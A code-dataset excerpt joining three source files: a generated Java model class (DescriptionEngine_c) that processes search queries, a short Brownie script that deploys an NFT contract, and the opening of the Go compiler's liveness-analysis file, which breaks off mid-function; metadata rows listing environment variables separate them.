static public DescriptionEngine_c resolveInstance(ModelRoot modelRoot,
java.util.UUID p_m_id) {
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
DescriptionEngine_c source = null;
synchronized (instances) {
Object[] key = {p_m_id};
source = (DescriptionEngine_c) instances.get(key);
if (source != null && !modelRoot.isCompareRoot()) {
source.convertFromProxy();
source.batchUnrelate();
//pre-process the uuid so that we re-use null uuid instance rather then creating a new one.
source.m_id = IdAssigner.preprocessUUID(p_m_id);
return source;
}
}
// there is no instance matching the id
DescriptionEngine_c new_inst = new DescriptionEngine_c(modelRoot,
p_m_id);
return new_inst;
}
public DescriptionEngine_c(ModelRoot modelRoot) {
super(modelRoot);
m_id = IdAssigner.NULL_UUID;
Object[] key = {m_id};
addInstanceToMap(key);
}
public Object getInstanceKey() {
Object[] key = {m_id};
return key;
}
public boolean setInstanceKey(UUID p_newKey) {
boolean changed = false;
// round p1
// round p2
// round p3
// round p4
// round p5
if (m_id != p_newKey) {
m_id = p_newKey;
changed = true;
}
return changed;
}
public boolean equals(Object elem) {
if (!(elem instanceof DescriptionEngine_c)) {
return false;
}
// check that the model-roots are the same
if (((NonRootModelElement) elem).getModelRoot() != getModelRoot()) {
return false;
}
return identityEquals(elem);
}
public boolean identityEquals(Object elem) {
if (!(elem instanceof DescriptionEngine_c)) {
return false;
}
DescriptionEngine_c me = (DescriptionEngine_c) elem;
// don't allow an empty id-value to produce a false positive result;
// in this case, use whether the two instances are actually the same
// one in memory, instead
if ((IdAssigner.NULL_UUID.equals(getId()) || IdAssigner.NULL_UUID
.equals(((DescriptionEngine_c) elem).getId())) && this != elem) {
return false;
}
if (!getId().equals(((DescriptionEngine_c) elem).getId()))
return false;
return true;
}
public boolean cachedIdentityEquals(Object elem) {
if (!(elem instanceof DescriptionEngine_c)) {
return false;
}
DescriptionEngine_c me = (DescriptionEngine_c) elem;
if (!getIdCachedValue().equals(
((DescriptionEngine_c) elem).getIdCachedValue()))
return false;
return true;
}
// Attributes
private java.util.UUID m_id;
// declare association references from this class
// referring navigation
SearchEngine_c IsSupertypeSearchEngine;
public void relateAcrossR9501To(SearchEngine_c target) {
relateAcrossR9501To(target, true);
}
public void relateAcrossR9501To(SearchEngine_c target, boolean notifyChanges) {
if (target == null)
return;
if (target == IsSupertypeSearchEngine)
return; // already related
if (IsSupertypeSearchEngine != target) {
Object oldKey = getInstanceKey();
if (IsSupertypeSearchEngine != null) {
IsSupertypeSearchEngine.clearBackPointerR9501To(this);
if (Boolean.valueOf(System.getenv("PTC_MCC_ENABLED")) == true) { //$NON-NLS-1$
Ooaofooa.log
.println(
ILogger.CONSISTENCY,
"DescriptionEngine_c.relateAcrossR9501To(SearchEngine_c target)",
"Relate performed across R9501 from Description Engine to Search Engine without unrelate of prior instance.");
}
}
IsSupertypeSearchEngine = target;
m_id = target.getId();
updateInstanceKey(oldKey, getInstanceKey());
target.setBackPointerR9501To(this);
target.addRef();
if (notifyChanges) {
RelationshipChangeModelDelta change = new RelationshipChangeModelDelta(
Modeleventnotification_c.DELTA_ELEMENT_RELATED, this,
target, "9501", "");
Ooaofooa.getDefaultInstance().fireModelElementRelationChanged(
change);
}
}
}
public void unrelateAcrossR9501From(SearchEngine_c target) {
unrelateAcrossR9501From(target, true);
}
public void unrelateAcrossR9501From(SearchEngine_c target,
boolean notifyChanges) {
if (target == null)
return;
if (IsSupertypeSearchEngine == null)
return; // already unrelated
if (target != IsSupertypeSearchEngine) {
Exception e = new Exception();
e.fillInStackTrace();
CorePlugin.logError(
"Tried to unrelate from non-related instance across R9501",
e);
return;
}
if (target != null) {
target.clearBackPointerR9501To(this);
}
if (IsSupertypeSearchEngine != null) {
m_id = IsSupertypeSearchEngine.getId();
IsSupertypeSearchEngine = null;
target.removeRef();
if (notifyChanges) {
RelationshipChangeModelDelta change = new RelationshipChangeModelDelta(
Modeleventnotification_c.DELTA_ELEMENT_UNRELATED, this,
target, "9501", "");
Ooaofooa.getDefaultInstance().fireModelElementRelationChanged(
change);
}
}
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(
SearchEngine_c[] targets) {
return getOneSEN_DEOnR9501(targets, null);
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(
SearchEngine_c[] targets, ClassQueryInterface_c test) {
DescriptionEngine_c ret_val = null;
if (targets != null) {
for (int i = 0; i < targets.length && ret_val == null; ++i) {
ret_val = getOneSEN_DEOnR9501(targets[i], test);
}
}
return ret_val;
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(SearchEngine_c target) {
return getOneSEN_DEOnR9501(target, null);
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(
SearchEngine_c target, boolean loadComponent) {
return getOneSEN_DEOnR9501(target.getModelRoot(), target, null,
loadComponent);
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(
SearchEngine_c target, ClassQueryInterface_c test) {
if (target != null) {
return getOneSEN_DEOnR9501(target.getModelRoot(), target, test);
}
return null;
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(ModelRoot modelRoot,
SearchEngine_c target, ClassQueryInterface_c test) {
return getOneSEN_DEOnR9501(modelRoot, target, test, true);
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(ModelRoot modelRoot,
SearchEngine_c target, ClassQueryInterface_c test,
boolean loadComponent) {
return find_getOneSEN_DEOnR9501(modelRoot, target, test);
}
private static DescriptionEngine_c find_getOneSEN_DEOnR9501(
ModelRoot modelRoot, SearchEngine_c target,
ClassQueryInterface_c test) {
if (target != null) {
DescriptionEngine_c source = (DescriptionEngine_c) target.backPointer_IsSubtypeDescriptionEngineIsSubtype_R9501;
if (source != null && (test == null || test.evaluate(source))) {
return source;
}
}
// not found
return null;
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c[] targets) {
return getManySEN_DEsOnR9501(targets, null);
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c[] targets, boolean loadComponent) {
return getManySEN_DEsOnR9501(targets, null, loadComponent);
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c[] targets, ClassQueryInterface_c test) {
return getManySEN_DEsOnR9501(targets, test, true);
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c[] targets, ClassQueryInterface_c test,
boolean loadComponent) {
if (targets == null || targets.length == 0 || targets[0] == null)
return new DescriptionEngine_c[0];
ModelRoot modelRoot = targets[0].getModelRoot();
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
Vector matches = new Vector();
for (int i = 0; i < targets.length; i++) {
DescriptionEngine_c source = (DescriptionEngine_c) targets[i].backPointer_IsSubtypeDescriptionEngineIsSubtype_R9501;
if (source != null && (test == null || test.evaluate(source))) {
matches.add(source);
}
}
if (matches.size() > 0) {
DescriptionEngine_c[] ret_set = new DescriptionEngine_c[matches
.size()];
matches.copyInto(ret_set);
return ret_set;
} else {
return new DescriptionEngine_c[0];
}
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c target) {
if (target != null) {
SearchEngine_c[] targetArray = new SearchEngine_c[1];
targetArray[0] = target;
return getManySEN_DEsOnR9501(targetArray);
} else {
DescriptionEngine_c[] result = new DescriptionEngine_c[0];
return result;
}
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c target, boolean loadComponent) {
if (target != null) {
SearchEngine_c[] targetArray = new SearchEngine_c[1];
targetArray[0] = target;
return getManySEN_DEsOnR9501(targetArray, loadComponent);
} else {
DescriptionEngine_c[] result = new DescriptionEngine_c[0];
return result;
}
}
public void batchRelate(ModelRoot modelRoot, boolean notifyChanges,
boolean searchAllRoots) {
batchRelate(modelRoot, false, notifyChanges, searchAllRoots);
}
public void batchRelate(ModelRoot modelRoot, boolean relateProxies,
boolean notifyChanges, boolean searchAllRoots) {
InstanceList instances = null;
ModelRoot baseRoot = modelRoot;
// R9501
SearchEngine_c relInst39126 = (SearchEngine_c) baseRoot
.getInstanceList(SearchEngine_c.class).get(new Object[]{m_id});
// if there was no local element, check for any global elements
// failing that proceed to check other model roots
if (relInst39126 == null) {
relInst39126 = (SearchEngine_c) Ooaofooa.getDefaultInstance()
.getInstanceList(SearchEngine_c.class)
.get(new Object[]{m_id});
}
if (relInst39126 == null && searchAllRoots && !baseRoot.isCompareRoot()) {
Ooaofooa[] roots = Ooaofooa.getInstances();
for (int i = 0; i < roots.length; i++) {
if (roots[i].isCompareRoot()) {
// never use elements from any compare root
continue;
}
relInst39126 = (SearchEngine_c) roots[i].getInstanceList(
SearchEngine_c.class).get(new Object[]{m_id});
if (relInst39126 != null)
break;
}
}
//synchronized
if (relInst39126 != null) {
if (relateProxies || !isProxy()
|| (inSameComponent(this, relInst39126) && !isProxy())) {
relInst39126.relateAcrossR9501To(this, notifyChanges);
}
}
}
public void batchUnrelate(boolean notifyChanges) {
NonRootModelElement inst = null;
// R9501
// SEN_E
inst = IsSupertypeSearchEngine;
unrelateAcrossR9501From(IsSupertypeSearchEngine, notifyChanges);
if (inst != null) {
inst.removeRef();
}
}
public static void batchRelateAll(ModelRoot modelRoot,
boolean notifyChanges, boolean searchAllRoots) {
batchRelateAll(modelRoot, notifyChanges, searchAllRoots, false);
}
public static void batchRelateAll(ModelRoot modelRoot, boolean notifyChanges, boolean searchAllRoots, boolean relateProxies)
{
InstanceList instances = modelRoot.getInstanceList(DescriptionEngine_c.class);
synchronized(instances) {
Iterator<NonRootModelElement> cursor = instances.iterator() ;
while (cursor.hasNext())
{
final DescriptionEngine_c inst = (DescriptionEngine_c)cursor.next() ;
inst.batchRelate(modelRoot, relateProxies, notifyChanges, searchAllRoots );
}
}
}
public static void clearInstances(ModelRoot modelRoot) {
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
synchronized (instances) {
for (int i = instances.size() - 1; i >= 0; i--) {
((NonRootModelElement) instances.get(i)).delete_unchecked();
}
}
}
public static DescriptionEngine_c DescriptionEngineInstance(
ModelRoot modelRoot, ClassQueryInterface_c test,
boolean loadComponent) {
DescriptionEngine_c result = findDescriptionEngineInstance(modelRoot,
test, loadComponent);
if (result == null && loadComponent) {
List pmcs = PersistenceManager.findAllComponents(modelRoot,
DescriptionEngine_c.class);
for (int i = 0; i < pmcs.size(); i++) {
PersistableModelComponent component = (PersistableModelComponent) pmcs
.get(i);
if (!component.isLoaded()) {
try {
component.load(new NullProgressMonitor());
result = findDescriptionEngineInstance(modelRoot, test,
loadComponent);
if (result != null)
return result;
} catch (Exception e) {
CorePlugin.logError("Error Loading component", e);
}
}
}
}
if (result != null && loadComponent) {
result.loadProxy();
}
return result;
}
private static DescriptionEngine_c findDescriptionEngineInstance(
ModelRoot modelRoot, ClassQueryInterface_c test,
boolean loadComponent) {
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
synchronized (instances) {
for (int i = 0; i < instances.size(); ++i) {
DescriptionEngine_c x = (DescriptionEngine_c) instances.get(i);
if (test == null || test.evaluate(x)) {
if (x.ensureLoaded(loadComponent))
return x;
}
}
}
return null;
}
public static DescriptionEngine_c DescriptionEngineInstance(
ModelRoot modelRoot, ClassQueryInterface_c test) {
return DescriptionEngineInstance(modelRoot, test, true);
}
public static DescriptionEngine_c DescriptionEngineInstance(
ModelRoot modelRoot) {
return DescriptionEngineInstance(modelRoot, null, true);
}
public static DescriptionEngine_c[] DescriptionEngineInstances(
ModelRoot modelRoot, ClassQueryInterface_c test,
boolean loadComponent) {
if (loadComponent) {
PersistenceManager.ensureAllInstancesLoaded(modelRoot,
DescriptionEngine_c.class);
}
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
Vector matches = new Vector();
synchronized (instances) {
for (int i = 0; i < instances.size(); ++i) {
DescriptionEngine_c x = (DescriptionEngine_c) instances.get(i);
if (test == null || test.evaluate(x)) {
if (x.ensureLoaded(loadComponent))
matches.add(x);
}
}
if (matches.size() > 0) {
DescriptionEngine_c[] ret_set = new DescriptionEngine_c[matches
.size()];
matches.copyInto(ret_set);
return ret_set;
} else {
return new DescriptionEngine_c[0];
}
}
}
public static DescriptionEngine_c[] DescriptionEngineInstances(
ModelRoot modelRoot, ClassQueryInterface_c test) {
return DescriptionEngineInstances(modelRoot, test, true);
}
public static DescriptionEngine_c[] DescriptionEngineInstances(
ModelRoot modelRoot) {
return DescriptionEngineInstances(modelRoot, null, true);
}
public boolean delete() {
boolean result = super.delete();
boolean delete_error = false;
String errorMsg = "The following relationships were not torn down by the Description Engine.dispose call: ";
SearchEngine_c testR9501Inst2 = SearchEngine_c.getOneSEN_EOnR9501(this,
false);
if (testR9501Inst2 != null) {
delete_error = true;
errorMsg = errorMsg + "9501 ";
}
if (delete_error == true) {
if (CorePlugin.getDefault().isDebugging()) {
Ooaofooa.log.println(ILogger.DELETE, "Description Engine",
errorMsg);
} else {
Exception e = new Exception();
e.fillInStackTrace();
CorePlugin.logError(errorMsg, e);
}
}
return result;
}
// end declare instance pool
// declare attribute accessors
public boolean isUUID(String attributeName) {
if (attributeName.equals("id")) {
return true;
}
return false;
}
public String getCompUniqueID() {
UUID tempID = null;
long longID = 0L;
StringBuffer result = new StringBuffer();
tempID = getId();
if (IdAssigner.NULL_UUID.equals(tempID))
tempID = getIdCachedValue();
result.append(Long.toHexString(tempID.getMostSignificantBits()));
result.append(Long.toHexString(tempID.getLeastSignificantBits()));
return result.toString();
}
// declare attribute accessors
public long getIdLongBased() {
if (IsSupertypeSearchEngine != null) {
return IsSupertypeSearchEngine.getIdLongBased();
}
return 0;
}
public java.util.UUID getId() {
if (IsSupertypeSearchEngine != null) {
return IsSupertypeSearchEngine.getId();
}
return IdAssigner.NULL_UUID;
}
public boolean hasSuperType() {
return (IsSupertypeSearchEngine != null);
}
public java.util.UUID getIdCachedValue() {
if (!IdAssigner.NULL_UUID.equals(m_id))
return m_id;
else
return getId();
}
public void setId(java.util.UUID newValue) {
if (newValue != null) {
if (newValue.equals(m_id)) {
return;
}
} else if (m_id != null) {
if (m_id.equals(newValue)) {
return;
}
} else {
return;
}
AttributeChangeModelDelta change = new AttributeChangeModelDelta(
Modeleventnotification_c.DELTA_ATTRIBUTE_CHANGE, this, "Id",
m_id, newValue, true);
m_id = IdAssigner.preprocessUUID(newValue);
Ooaofooa.getDefaultInstance().fireModelElementAttributeChanged(change);
}
// end declare accessors
public static void checkClassConsistency(ModelRoot modelRoot) {
Ooaofooa.log
.println(ILogger.OPERATION, "Description Engine", //$NON-NLS-1$
" Operation entered: Description Engine::checkClassConsistency"); //$NON-NLS-1$
if (Boolean.valueOf(System.getenv("PTC_MCC_ENABLED")) == false) { //$NON-NLS-1$
return;
}
DescriptionEngine_c[] objs = DescriptionEngine_c
.DescriptionEngineInstances(modelRoot, null, false);
for (int i = 0; i < objs.length; i++) {
objs[i].checkConsistency();
}
}
public boolean checkConsistency() {
Ooaofooa.log.println(ILogger.OPERATION, "Description Engine", //$NON-NLS-1$
" Operation entered: Description Engine::checkConsistency"); //$NON-NLS-1$
if (Boolean.valueOf(System.getenv("PTC_MCC_ENABLED")) == false) { //$NON-NLS-1$
return true;
}
ModelRoot modelRoot = getModelRoot();
boolean retval = true;
class DescriptionEngine_c_test39128_c implements ClassQueryInterface_c {
DescriptionEngine_c_test39128_c(java.util.UUID p39129) {
m_p39129 = p39129;
}
private java.util.UUID m_p39129;
public boolean evaluate(Object candidate) {
DescriptionEngine_c selected = (DescriptionEngine_c) candidate;
boolean retval = false;
retval = (selected.getId().equals(m_p39129));
return retval;
}
}
DescriptionEngine_c[] objs39127 = DescriptionEngine_c
.DescriptionEngineInstances(modelRoot,
new DescriptionEngine_c_test39128_c(getId()));
if (((objs39127.length) == 0)) {
if (CorePlugin.getDefault().isDebugging()) {
Ooaofooa.log
.println(ILogger.CONSISTENCY,
"Description Engine", //$NON-NLS-1$
"Consistency: Object: Description Engine: Cardinality of an identifier is zero. " //$NON-NLS-1$
+ "Actual Value: " + Integer.toString(objs39127.length)); //$NON-NLS-1$
} else {
Exception e = new Exception();
CorePlugin
.logError(
"Consistency: Object: Description Engine: Cardinality of an identifier is zero. " //$NON-NLS-1$
+ "Actual Value: " //$NON-NLS-1$
+ Integer.toString(objs39127.length), e);
}
retval = false;
}
if (((objs39127.length) > 1)) {
if (CorePlugin.getDefault().isDebugging()) {
Ooaofooa.log
.println(ILogger.CONSISTENCY,
"Description Engine", //$NON-NLS-1$
"Consistency: Object: Description Engine: Cardinality of an identifier is greater than 1. " //$NON-NLS-1$
+ "Actual Value: " //$NON-NLS-1$
+ Integer.toString(objs39127.length)
+ " Id: " + "Not Printable"); //$NON-NLS-1$
} else {
Exception e = new Exception();
CorePlugin
.logError(
"Consistency: Object: Description Engine: Cardinality of an identifier is greater than 1. " //$NON-NLS-1$
+ "Actual Value: " //$NON-NLS-1$
+ Integer.toString(objs39127.length)
+ " Id: " + "Not Printable", e); //$NON-NLS-1$
}
retval = false;
}
// Description Engine is a subtype in association: rel.Numb = 9501
// The supertype class is: Search Engine
class SearchEngine_c_test39133_c implements ClassQueryInterface_c {
SearchEngine_c_test39133_c(java.util.UUID p39134) {
m_p39134 = p39134;
}
private java.util.UUID m_p39134;
public boolean evaluate(Object candidate) {
SearchEngine_c selected = (SearchEngine_c) candidate;
boolean retval = false;
retval = (selected.getId().equals(m_p39134));
return retval;
}
}
SearchEngine_c[] objs39132 = SearchEngine_c.SearchEngineInstances(
modelRoot, new SearchEngine_c_test39133_c(getId()));
if (((objs39132.length) != 1)) {
if (CorePlugin.getDefault().isDebugging()) {
Ooaofooa.log
.println(ILogger.CONSISTENCY,
"Description Engine", //$NON-NLS-1$
"Consistency: Object: Description Engine: Association: 9501: Cardinality of a supertype is not equal to 1. " //$NON-NLS-1$
+ "Actual Value: " + Integer.toString(objs39132.length)); //$NON-NLS-1$
} else {
Exception e = new Exception();
CorePlugin
.logError(
"Consistency: Object: Description Engine: Association: 9501: Cardinality of a supertype is not equal to 1. " //$NON-NLS-1$
+ "Actual Value: " //$NON-NLS-1$
+ Integer.toString(objs39132.length), e);
}
retval = false;
}
return retval;
}
// declare transform functions
public void Processquery(final Object p_Monitor,
final java.util.UUID p_Queryid) {
Ooaofooa.log.println(ILogger.OPERATION, "Description Engine",
" Operation entered: DescriptionEngine::Processquery");
final ModelRoot modelRoot = getModelRoot();
Query_c v_query = (Query_c) modelRoot.getInstanceList(Query_c.class)
.getGlobal(null, p_Queryid);
SearchEngine_c v_engine = SearchEngine_c.getOneSEN_EOnR9501(this);
SearchParticipant_c[] v_participants = SearchParticipant_c
.getManySP_SPsOnR9502(v_engine);
SearchParticipant_c v_participant = null;
for (int i36657 = 0; i36657 < v_participants.length; i36657++) {
v_participant = v_participants[i36657];
DescriptionSearchable_c v_descriptionParticipant = DescriptionSearchable_c
.getOneSP_DSOnR9702(SearchableElement_c
.getOneSP_SEOnR9700(v_participant));
if (((v_descriptionParticipant != null))) {
SearchResult_c v_searchResult = (SearchResult_c) modelRoot
.getInstanceList(SearchResult_c.class).getGlobal(null,
Gd_c.Null_unique_id());
String v_contents = v_descriptionParticipant
.getSearchablevalue();
int v_result = 0;
while ((v_result >= 0)) {
java.util.UUID v_matchResultId = Search_c
.Locatecontentresults(v_contents,
v_query.getCasesensitive(),
v_query.getPattern());
ContentMatchResult_c v_matchResult = (ContentMatchResult_c) modelRoot
.getInstanceList(ContentMatchResult_c.class)
.getGlobal(null, v_matchResultId);
if (((v_matchResult != null))) {
v_result = v_matchResult.getStartposition();
if ((v_result >= 0)) {
if (((v_searchResult == null))) {
v_searchResult = new SearchResult_c(modelRoot);
Ooaofooa.getDefaultInstance()
.fireModelElementCreated(
new BaseModelDelta(
Modeleventnotification_c.DELTA_NEW,
v_searchResult));
if (v_searchResult != null) {
v_searchResult
.relateAcrossR9503To(v_engine);
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Relate attempted on null left hand instance.",
t);
}
if (v_searchResult != null) {
v_searchResult
.relateAcrossR9802To(v_participant);
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Relate attempted on null left hand instance.",
t);
}
}
Match_c v_match = new Match_c(modelRoot);
Ooaofooa.getDefaultInstance()
.fireModelElementCreated(
new BaseModelDelta(
Modeleventnotification_c.DELTA_NEW,
v_match));
ContentMatch_c v_contentMatch = new ContentMatch_c(
modelRoot);
Ooaofooa.getDefaultInstance()
.fireModelElementCreated(
new BaseModelDelta(
Modeleventnotification_c.DELTA_NEW,
v_contentMatch));
if (v_match != null) {
v_match.relateAcrossR9801To(v_contentMatch);
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Relate attempted on null left hand instance.",
t);
}
if (v_searchResult != null) {
v_searchResult.relateAcrossR9800To(v_match);
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Relate attempted on null left hand instance.",
t);
}
if (v_contentMatch != null) {
v_contentMatch.setStartposition(v_matchResult
.getStartposition());
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Attribute write attempted on null instance.",
t);
}
if (v_contentMatch != null) {
v_contentMatch.setMatchlength(v_matchResult
.getLength());
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Attribute write attempted on null instance.",
t);
}
if (v_matchResult != null) {
// get the location of this element in the instance list
// before deleting
if (v_matchResult.delete()) {
Ooaofooa.getDefaultInstance()
.fireModelElementDeleted(
new BaseModelDelta(
Modeleventnotification_c.DELTA_DELETE,
v_matchResult));
}
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Delete attempted on null instance.",
t);
}
Search_c.Matchcreated(v_match.Converttoinstance());
}
}
else {
v_result = -1;
}
if ((Search_c.Monitorcanceled(p_Monitor))) {
Search_c.Clearquerydata();
return;
}
}
Search_c.Clearquerydata();
}
}
} // End processQuery
// end transform functions
public Object getAdapter(Class adapter) {
Object superAdapter = super.getAdapter(adapter);
if (superAdapter != null) {
return superAdapter;
}
return null;
}
} // end Description Engine
| [
"\"PTC_MCC_ENABLED\"",
"\"PTC_MCC_ENABLED\"",
"\"PTC_MCC_ENABLED\""
]
| []
| [
"PTC_MCC_ENABLED"
]
| [] | ["PTC_MCC_ENABLED"] | java | 1 | 0 | |
scripts/deploy_nft.py | from brownie import nft
from scripts.scripts import *
def main():
deploy(os.getenv("TOKEN_NAME"), os.getenv("TOKEN_SYMBOL"))
def deploy(name, symbol):
acc = get_account()
contract = nft.deploy(
name, symbol, {"from": acc}, publish_source=get_publish_source()
)
print(
f'NFT "{contract.name()}({contract.symbol()}) deployed to {get_network()} network!'
)
| []
| []
| [
"TOKEN_NAME",
"TOKEN_SYMBOL"
]
| [] | ["TOKEN_NAME", "TOKEN_SYMBOL"] | python | 2 | 0 | |
src/cmd/compile/internal/gc/plive.go | // Copyright 2013 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Garbage collector liveness bitmap generation.
// The command line flag -live causes this code to print debug information.
// The levels are:
//
// -live (aka -live=1): print liveness lists as code warnings at safe points
// -live=2: print an assembly listing with liveness annotations
//
// Each level includes the earlier output as well.
package gc
import (
"cmd/compile/internal/ssa"
"cmd/compile/internal/types"
"cmd/internal/obj"
"cmd/internal/objabi"
"cmd/internal/src"
"crypto/md5"
"crypto/sha1"
"fmt"
"os"
"strings"
)
// TODO(mdempsky): Update to reference OpVar{Def,Kill,Live} instead.
// VARDEF is an annotation for the liveness analysis, marking a place
// where a complete initialization (definition) of a variable begins.
// Since the liveness analysis can see initialization of single-word
// variables quite easy, gvardef is usually only called for multi-word
// or 'fat' variables, those satisfying isfat(n->type).
// However, gvardef is also called when a non-fat variable is initialized
// via a block move; the only time this happens is when you have
// return f()
// for a function with multiple return values exactly matching the return
// types of the current function.
//
// A 'VARDEF x' annotation in the instruction stream tells the liveness
// analysis to behave as though the variable x is being initialized at that
// point in the instruction stream. The VARDEF must appear before the
// actual (multi-instruction) initialization, and it must also appear after
// any uses of the previous value, if any. For example, if compiling:
//
// x = x[1:]
//
// it is important to generate code like:
//
// base, len, cap = pieces of x[1:]
// VARDEF x
// x = {base, len, cap}
//
// If instead the generated code looked like:
//
// VARDEF x
// base, len, cap = pieces of x[1:]
// x = {base, len, cap}
//
// then the liveness analysis would decide the previous value of x was
// unnecessary even though it is about to be used by the x[1:] computation.
// Similarly, if the generated code looked like:
//
// base, len, cap = pieces of x[1:]
// x = {base, len, cap}
// VARDEF x
//
// then the liveness analysis will not preserve the new value of x, because
// the VARDEF appears to have "overwritten" it.
//
// VARDEF is a bit of a kludge to work around the fact that the instruction
// stream is working on single-word values but the liveness analysis
// wants to work on individual variables, which might be multi-word
// aggregates. It might make sense at some point to look into letting
// the liveness analysis work on single-word values as well, although
// there are complications around interface values, slices, and strings,
// all of which cannot be treated as individual words.
//
// VARKILL is the opposite of VARDEF: it marks a value as no longer needed,
// even if its address has been taken. That is, a VARKILL annotation asserts
// that its argument is certainly dead, for use when the liveness analysis
// would not otherwise be able to deduce that fact.
// BlockEffects summarizes the liveness effects on an SSA block.
type BlockEffects struct {
lastbitmapindex int // for livenessepilogue
// Computed during livenessprologue using only the content of
// individual blocks:
//
// uevar: upward exposed variables (used before set in block)
// varkill: killed variables (set in block)
// avarinit: addrtaken variables set or used (proof of initialization)
uevar bvec
varkill bvec
avarinit bvec
// Computed during livenesssolve using control flow information:
//
// livein: variables live at block entry
// liveout: variables live at block exit
// avarinitany: addrtaken variables possibly initialized at block exit
// (initialized in block or at exit from any predecessor block)
// avarinitall: addrtaken variables certainly initialized at block exit
// (initialized in block or at exit from all predecessor blocks)
livein bvec
liveout bvec
avarinitany bvec
avarinitall bvec
}
// A collection of global state used by liveness analysis.
type Liveness struct {
fn *Node
f *ssa.Func
vars []*Node
idx map[*Node]int32
stkptrsize int64
be []BlockEffects
// stackMapIndex maps from safe points (i.e., CALLs) to their
// index within the stack maps.
stackMapIndex map[*ssa.Value]int
// An array with a bit vector for each safe point tracking live variables.
livevars []bvec
cache progeffectscache
}
type progeffectscache struct {
textavarinit []int32
retuevar []int32
tailuevar []int32
initialized bool
}
// livenessShouldTrack reports whether the liveness analysis
// should track the variable n.
// We don't care about variables that have no pointers,
// nor do we care about non-local variables,
// nor do we care about empty structs (handled by the pointer check),
// nor do we care about the fake PAUTOHEAP variables.
func livenessShouldTrack(n *Node) bool {
return n.Op == ONAME && (n.Class() == PAUTO || n.Class() == PPARAM || n.Class() == PPARAMOUT) && types.Haspointers(n.Type)
}
// getvariables returns the list of on-stack variables that we need to track
// and a map for looking up indices by *Node.
func getvariables(fn *Node) ([]*Node, map[*Node]int32) {
var vars []*Node
for _, n := range fn.Func.Dcl {
if livenessShouldTrack(n) {
vars = append(vars, n)
}
}
idx := make(map[*Node]int32, len(vars))
for i, n := range vars {
idx[n] = int32(i)
}
return vars, idx
}
func (lv *Liveness) initcache() {
if lv.cache.initialized {
Fatalf("liveness cache initialized twice")
return
}
lv.cache.initialized = true
for i, node := range lv.vars {
switch node.Class() {
case PPARAM:
// A return instruction with a p.to is a tail return, which brings
// the stack pointer back up (if it ever went down) and then jumps
// to a new function entirely. That form of instruction must read
// all the parameters for correctness, and similarly it must not
// read the out arguments - they won't be set until the new
// function runs.
lv.cache.tailuevar = append(lv.cache.tailuevar, int32(i))
if node.Addrtaken() {
lv.cache.textavarinit = append(lv.cache.textavarinit, int32(i))
}
case PPARAMOUT:
// If the result had its address taken, it is being tracked
// by the avarinit code, which does not use uevar.
// If we added it to uevar too, we'd not see any kill
// and decide that the variable was live entry, which it is not.
// So only use uevar in the non-addrtaken case.
// The p.to.type == obj.TYPE_NONE limits the bvset to
// non-tail-call return instructions; see note below for details.
if !node.Addrtaken() {
lv.cache.retuevar = append(lv.cache.retuevar, int32(i))
}
}
}
}
// A liveEffect is a set of flags that describe an instruction's
// liveness effects on a variable.
//
// The possible flags are:
// uevar - used by the instruction
// varkill - killed by the instruction
// for variables without address taken, means variable was set
// for variables with address taken, means variable was marked dead
// avarinit - initialized or referred to by the instruction,
// only for variables with address taken but not escaping to heap
//
// The avarinit output serves as a signal that the data has been
// initialized, because any use of a variable must come after its
// initialization.
type liveEffect int
const (
uevar liveEffect = 1 << iota
varkill
avarinit
)
// valueEffects returns the index of a variable in lv.vars and the
// liveness effects v has on that variable.
// If v does not affect any tracked variables, it returns -1, 0.
func (lv *Liveness) valueEffects(v *ssa.Value) (int32, liveEffect) {
n, e := affectedNode(v)
if e == 0 || n == nil || n.Op != ONAME { // cheapest checks first
return -1, 0
}
// AllocFrame has dropped unused variables from
// lv.fn.Func.Dcl, but they might still be referenced by
// OpVarFoo pseudo-ops. Ignore them to prevent "lost track of
// variable" ICEs (issue 19632).
switch v.Op {
case ssa.OpVarDef, ssa.OpVarKill, ssa.OpVarLive, ssa.OpKeepAlive:
if !n.Name.Used() {
return -1, 0
}
}
var effect liveEffect
if n.Addrtaken() {
if v.Op != ssa.OpVarKill {
effect |= avarinit
}
if v.Op == ssa.OpVarDef || v.Op == ssa.OpVarKill {
effect |= varkill
}
} else {
// Read is a read, obviously.
// Addr by itself is also implicitly a read.
//
// Addr|Write means that the address is being taken
// but only so that the instruction can write to the value.
// It is not a read.
if e&ssa.SymRead != 0 || e&(ssa.SymAddr|ssa.SymWrite) == ssa.SymAddr {
effect |= uevar
}
if e&ssa.SymWrite != 0 && (!isfat(n.Type) || v.Op == ssa.OpVarDef) {
effect |= varkill
}
}
if effect == 0 {
return -1, 0
}
if pos, ok := lv.idx[n]; ok {
return pos, effect
}
return -1, 0
}
// affectedNode returns the *Node affected by v
func affectedNode(v *ssa.Value) (*Node, ssa.SymEffect) {
